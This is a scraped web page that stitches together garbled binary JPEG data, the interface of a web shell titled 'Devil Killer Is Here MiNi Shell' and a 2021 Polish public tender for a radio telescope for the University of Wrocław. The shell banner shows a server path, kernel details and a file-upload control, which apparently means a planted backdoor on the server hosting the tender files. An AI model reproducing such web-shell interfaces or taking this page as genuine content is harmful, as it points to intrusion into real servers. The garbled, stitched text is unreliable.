JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210618/0008714501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00087145 z dnia 2021-06-18</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa, instalacja i uruchomienie kompletnego radioteleskopu do obserwacji radiowych słońca<br/>i innych obiektów astrofizycznych na potrzeby współpracy z ESA dla OEA UWr w Białkowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">UNIWERSYTET WROCŁAWSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001301</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Uniwersytecki 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">50-137</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">713752004</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">katarzyna.danielewska-drzazga@uwr.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.uni.wroc.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa, instalacja i uruchomienie kompletnego radioteleskopu do obserwacji radiowych słońca<br/>i innych obiektów astrofizycznych na potrzeby współpracy z ESA dla OEA UWr w Białkowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b023052f-cffe-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00087145</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003709/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.34 Dostawa, montaż i uruchomienie astronomicznych odbiorników radiowych do Ośrodka Edukacji Astronomicznej w Białkowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Rewitalizacja Zespołu pałacowego i Obserwatorium astronomicznego w Białkowie wraz z zagospodarowaniem terenu na Centrum Edukacji Astronomicznej” na podstawie Umowy nr RPDS.06.03.01-02-0048/17-00 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.uni.wroc.pl/374/280/dostawy-ponizej-214-000-euro.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja elektroniczna między Zamawiającym a Wykonawcami odbywa się przy<br/>użyciu środków komunikacji elektronicznej (w tym składanie ofert Wykonawcy i załączniki do oferty) za<br/>pośrednictwem dedykowanego formularza (Formularza do komunikacji dostępnego na<br/>ePUAPhttps://obywatel.gov.pl/nforms/ezamowienia oraz udostępnionego przez<br/>miniPortalhttps://miniportal.uzp.gov.pl/ lub poczty elektronicznej katarzyna.danielewska-drzazga@<br/>uwr.edu.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych,elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>ich użyciu opisane zostały w Instrukcji użytkownika systemu<br/>Miniportalhttps://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortal-ePUAP.pdf oraz Warunkach<br/>korzystania z elektronicznej platformy usług administracji<br/>publicznejhttps://epuap.gov.pl/wps/portal/strefa-klienta/regulamin 2. Dokumenty elektroniczne,<br/>oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem Formularza do komunikacji jako załączniki. Maksymalny rozmiar plików przesyłanych<br/>za pośrednictwem dedykowanych formularzy wynosi 150 MB. Maksymalny rozmiar plików<br/>przesyłanych przez mail wynosi 20 MB.3. Oferta, oświadczenie, o którym mowa w art. 125 ust. 1 uPzp,<br/>podmiotowe środki dowodowe, w tym oświadczenie o którym mowa w art. 117 ust. 4 uPzp, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 uPzp,<br/>przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się w postaci elektronicznej w języku<br/>polskim lub angielskim, w ogólnodostępnych formatach danych, w szczególności .pdf, .doc, .docx, .rtf,<br/>.xps, .odt, .txt oraz składa pod rygorem nieważności, w formie elektronicznej (z kwalifikowanym<br/>podpisem) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <p class="mb-0">angielski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1-2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO” oraz art. 19 uPzp, Zamawiający – Uniwersytet Wrocławski - informuje, że: <br/>•	administratorem Pani/Pana danych osobowych jest Uniwersytet Wrocławski, pl. Uniwersytecki 1, 50-137 Wrocław, reprezentowany przez Rektora;<br/>•	o celach i sposobach przetwarzania danych osobowych podawanych w związku z realizacją procedur udzielania zamówień publicznych decyduje Uniwersytet jako Administrator danych;<br/>•	Administrator wyznaczył osobę pełniącą zadania Inspektora Ochrony Danych Osobowych i można kontaktować się poprzez adres email: iod@uwr.edu.pl;<br/>•	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu wyłonienia wykonawcy w przedmiotowym postępowaniu o zamówienie publiczne przeprowadzane zgodnie z uPzp oraz w pozostałych celach określonych w uPzp;<br/>•	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 uPzp; ponadto dane osobowe mogą zostać przekazane na zasadach wynikających z ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej;<br/>•	okres przechowywania Pani/Pana danych osobowych wynosi odpowiednio: <br/>- zgodnie z art. 78 ust. 1 uPzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, <br/>- jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; <br/>- w przypadku zamówień współfinansowanych ze środków UE przez okres, o którym mowa w art. 125 ust 4 lit d) w zw z art. 140 Rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 1303/2013 i wynikających z umów o dofinansowanie projektów finansowanych ze środków pochodzących z UE;<br/>- okres przechowywania wynika również z ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach<br/>•	obowiązek podania przez Panią/Pana danych osobowych jest wymogiem ustawowym wynikającym z uPzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego i jest warunkiem zawarcia umowy o zamówienie publiczne; konsekwencją nieudostępnienia do przetwarzania danych osobowych będzie odrzucenie złożonej oferty<br/>•	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>•	Pani/Pana dane osobowe będą przekazywane do państwa trzeciego (poza UE) /organizacji międzynarodowej na zasadach określonych w uPzp. Może Pan/ Pani uzyskać kopię danych osobowych przekazywanych do państwa trzeciego na zasadach wynikających z uPzp;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">•	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>- w przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego;<br/>- wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do zakończenia postępowania o udzielenie zamówienia publicznego;<br/>• nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>2. Jeżeli na etapie realizacji umowy nastąpi taka konieczność Zamawiający będzie wymagał podpisania umowy powierzenia danych osobowych.<br/>3.	Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX uPzp, do upływu terminu na ich wniesienie;<br/>4.	W przypadku, gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO, spowoduje ograniczenie przetwarzania danych osobowych zawartych <br/>w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia, Zamawiający nie udostępnia tych danych, chyba, że zachodzą przesłanki, o których mowa w art. 18 ust. 2 RODO; <br/>5.	Udostępnienie ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych o których mowa w art. 9 ust. 1 RODO, zebranych w toku postępowania o udzielenie zamówienia;<br/>6.	W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia , o których mowa w art. 15 ust. 1-3 RODO, Zamawiający może żądać od osoby, występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>7.	Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO, nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>8. W przypadku danych osobowych zamieszczonych przez zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 RODO, są wykonywane <br/>w drodze żądania skierowanego do Zamawiającego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.272.7.2021.KDD</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 834744,51 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 613945,94 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa, instalacja i uruchomienie (w formule „pod klucz”) kompletnego radioteleskopu do obserwacji radiowych Słońca i innych obiektów astrofizycznych [dalej: RTP] na potrzeby współpracy z Europejską Agencją Kosmiczną (ESA) dla Ośrodka Edukacji Astronomicznej Uniwersytetu Wrocławskiego w Białkowie [dalej: OEA UWr] oraz szkolenie podstawowe i aplikacyjne osób wskazanych przez Zamawiającego w zakresie obsługi i eksploatacji RTP i gwarancja.<br/>2.	Szczegółowy opis wymaganych przez Zamawiającego parametrów technicznych i właściwości użytkowych RTP zawarty jest w Opisie Przedmiotu Zamówienia [dalej: OPZ] stanowiącym Załącznik nr 4.<br/>3.	Szczegółowy zakres obowiązków wykonania przedmiotu zamówienia znajduje się we wzorze umowy (który stanowi projektowane postanowienia umowy w rozumieniu art. 281 ust. 1 pkt 7 uPzp), stanowiącym załącznik nr 5 do SWZ. <br/>4. Oferta musi być jednoznaczna i kompleksowa, tj. obejmować cały asortyment przedmiotu<br/>zamówienia. Przedmiot zamówienia musi być kompletny ze wszystkimi składnikami<br/>sprzętowymi, oprogramowaniem, w tym podzespołami, elementami, materiałami, programami,<br/>bazami danych etc., licencjami, podręcznikami i innymi składnikami sprzętowymi<br/>i programowymi niezbędnymi do uruchomienia i eksploatacji RTP w OEA UWr. Oferowany<br/>przedmiot zamówienia musi spełniać wymogi Zamawiającego. Wykonawca na etapie realizacji<br/>zamówienia, wykonuje przedmiot zamówienia zgodnie z wymogami Zamawiającego.<br/>5. Zamawiający wymaga, aby Wykonawca udzielił gwarancji i rękojmi na cały przedmiot<br/>zamówienia na okres 24 miesięcy licząc od daty odbioru Przedmiotu Umowy. Szczegóły<br/>dotyczące gwarancji znajdują się w § 6 wzoru umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32344200-8 - Odbiorniki radiowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32324310-6 - Anteny satelitarne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">170 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się<br/>kierował następującymi kryteriami:<br/>Kryterium 1: Cena (C)– 60% wyliczone według wzoru: C = (Cmin/Cn) x 60<br/>Kryterium 2: Parametry techniczne oferowanego radioteleskopu (PT) – 40 %, w tym:<br/>PT1 – Oferowany radioteleskop posiada możliwość kalibracji danych w czasie rzeczywistym (w chwili<br/>rejestracji) zgodnie z pkt 9.2 OPZ- 5%<br/>Punkty w tym podkryterium zostaną przyznane na podstawie weryfikacji dołączonego do oferty opisu<br/>przedmiotu zamówienia – OPZ (Załącznik nr 4 do SWZ), który ma potwierdzać, że oferowane<br/>urządzenie posiada możliwość kalibracji danych w czasie rzeczywistym (w chwili rejestracji) - 5<br/>punktów otrzyma Wykonawca, który zaoferuje radioteleskop posiadający wskazany parametr<br/>techniczny.<br/>PT2 – Oferowany radioteleskop posiada zakres pasma do 4 GHz dla pkt 2.1.D, 3.1, 5.1, 6.1-6.3, 6.8 i<br/>7.1 OPZ – 20 %<br/>Punkty w tym podkryterium zostaną przyznane na podstawie weryfikacji dołączonego do oferty opisu przedmiotu zamówienia – OPZ (Załącznik nr 4) - który ma potwierdzać, że oferowane urządzenie<br/>posiada wymagane zakresy o częstotliwości do 4 GHz - 20 punktów otrzyma Wykonawca, który<br/>zaoferuje radioteleskop posiadający wszystkie wskazane parametry techniczne wymienione w pkt 2.1<br/>D, 3.1, 5.1, 6.1 – 6.3, 6.8 i 7.1 OPZ.<br/>PT3 – Oferowany radioteleskop posiada kompletny system kalibracyjny umożliwiający kalibrację w<br/>zakresie częstotliwości w przedziale od 20 MHz do 3 GHz (preferowane do 4 GHz) zgodnie z pkt 7.2<br/>OPZ -15%<br/>Punkty w tym podkryterium zostaną przyznane na podstawie weryfikacji dołączonego do oferty opisu<br/>przedmiotu zamówienia – OPZ (Załącznik nr 4 do SWZ), który ma potwierdzać, że oferowane<br/>urządzenie posiada kompletny system kalibracyjny umożliwiający kalibrację w zakresie częstotliwości<br/>w przedziale od 20 MHz do górnej granicy pasma odbieranego przez radioteleskop - 15 punktów<br/>otrzyma Wykonawca, który zaoferuje radioteleskop posiadający wskazany parametr techniczny.<br/>Zamawiający dokona oceny ofert, przyznając punkty w ramach poszczególnych kryteriów oceny ofert,<br/>przyjmując zasadę, że 1% = 1pkt.<br/>W przypadku negatywnej weryfikacji bądź niewypełnienia/braku potwierdzenia przez Wykonawcę<br/>parametrów technicznych ocenianych w kryterium oceny ofert, oferta Wykonawcy otrzyma 0 pkt w w/w<br/>podkryteriach.<br/>2. Łączna wartość punktowa oferty wyliczana będzie wg wzoru:<br/>W = C + PT1 + PT2 + PT3<br/>3. Maksymalna łączna ilość punktów, jaką może otrzymać oferta Wykonawcy wynosi 100 pkt. Sposób<br/>obliczania wartości punktowej według ww. kryteriów został podany w rozdziale XIV SWZ.<br/>4. Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów w łącznej<br/>ocenie punktowej.<br/>5. Zamawiający oceni i porówna oferty niepodlegające odrzuceniu, złożone przez Wykonawców<br/>niepodlegających wykluczeniu z niniejszego postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne oferowanego radioteleskopu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zamawiający uzna warunek za spełniony, jeśli Wykonawca należycie zrealizował w okresie<br/>ostatnich 3 lat od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, co najmniej jedną dostawę wraz z instalacją i<br/>uruchomieniem radioteleskopu o wartości min. 300 000 zł netto.<br/>Do przeliczenia wartości występujących w innych walutach niż PLN należy przyjąć jako kurs<br/>przeliczeniowy średni kurs Narodowego Banku Polskiego (NBP), z dnia opublikowania<br/>ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, przy czym średnie kursy walut<br/>dostępne są pod następującym adresem internetowym: http://www.nbp.pl/home.aspx?<br/>f=/Kursy/kursy.html<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia<br/>przez dwóch lub więcej Wykonawców, Zamawiający uzna wymagany warunek za spełniony<br/>jeżeli spełni go co najmniej jeden z Wykonawców samodzielnie.<br/>3. Zgodnie z art. 116 ust. 1 uPzp oceniając zdolność techniczną lub zawodową, Zamawiający<br/>może, 